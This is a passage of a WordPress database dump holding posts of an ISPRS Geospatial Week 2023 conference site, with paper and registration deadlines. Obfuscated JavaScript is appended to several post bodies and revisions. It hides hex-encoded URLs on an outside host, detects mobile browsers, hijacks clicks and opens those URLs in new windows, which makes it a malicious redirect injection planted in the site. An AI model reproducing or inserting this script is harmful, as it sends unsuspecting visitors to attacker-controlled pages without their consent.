8a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','codecanyon-eJrpSzBr-wpbakery-page-builder-for-wordpress.zip','','private','open','closed','','codecanyon-ejrpszbr-wpbakery-page-builder-for-wordpress-zip','','','2023-03-30 03:54:55','2023-03-30 03:54:55','',0,'https://gsw2023.com/wp-content/uploads/2023/03/codecanyon-eJrpSzBr-wpbakery-page-builder-for-wordpress.zip',0,'attachment','',0),
(3963,1,'2023-03-30 04:14:09','2023-03-30 04:14:09','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>\n<ol>\n<li><strong>Annals (Fully Reviewed Papers):</strong></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Camera ready paper submission: June 15, 2023 <span style=\"text-decoration: line-through;\">June 1, 2023</span></li>\n<li><span style=\"text-decoration: line-through;\">Priority well be given to early Submissions</span></li>\n</ul>\n</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration deadlines</strong></span></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-03-30 04:14:09','2023-03-30 04:14:09','',2654,'https://gsw2023.com/?p=3963',0,'revision','',0),
(3964,1,'2023-03-30 04:15:46','2023-03-30 04:15:46','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Camera ready paper submission: June 15, 2023 <span style=\"text-decoration: line-through;\">June 1, 2023</span></li>\n<li><strong>Priority well be given to early Submissions</strong></li>\n</ul>\n</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration deadlines</strong></span></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 